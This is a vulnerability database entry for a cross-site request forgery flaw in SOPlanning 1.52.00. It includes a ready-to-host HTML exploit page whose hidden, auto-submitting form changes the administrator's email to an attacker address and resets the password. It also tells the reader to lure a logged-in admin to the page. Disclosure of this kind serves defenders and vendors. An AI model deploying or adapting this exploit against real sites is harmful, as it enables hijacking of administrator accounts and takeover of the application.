SOPlanning 1.52.00 Cross Site Request Forgery

2024.05.04
Credit: liquidsky
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover) Application: SOPlanning Version: 1.52.00 Date: 4/22/24 Exploit Author: Joseph McPeters (Liquidsky) Vendor Homepage: https://www.soplanning.org/en/ Software Link: https://sourceforge.net/projects/soplanning/ Tested on: Linux CVE: Not yet assigned Description: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php' a remote unautheticated attacker can hijack the admin account. The remote attacker can force the admins browser to make requests by sending them to an external page and update the admins password and email therefore taking over the admin panel. Instructions: Host the exploit code included and have the admin visit the CSRF exploit page while logged in. It will be noticed that the password and email for the main admin have been changed to the specified email and password. Liquidsky @ Specialized Security Services Inc. (S3) | Shout out to the team! --> <html> <body> <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST"> <input type="hidden" name="xajax" value="submitFormProfil" /> <input type="hidden" name="xajaxr" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" /> <!-- Update with attack email to change the admins email to yours --> <input type="hidden" name="xajaxargs&#91;&#93;" value=pwn@mail.lv<mailto:pwn@mail.lv> /> <!-- Update the following field to change the admins password to the password in the field --> <input type="hidden" name="xajaxargs&#91;&#93;" value="password" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="fr" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="0" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="1" /> </form> <script> document.forms[0].submit(); </script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top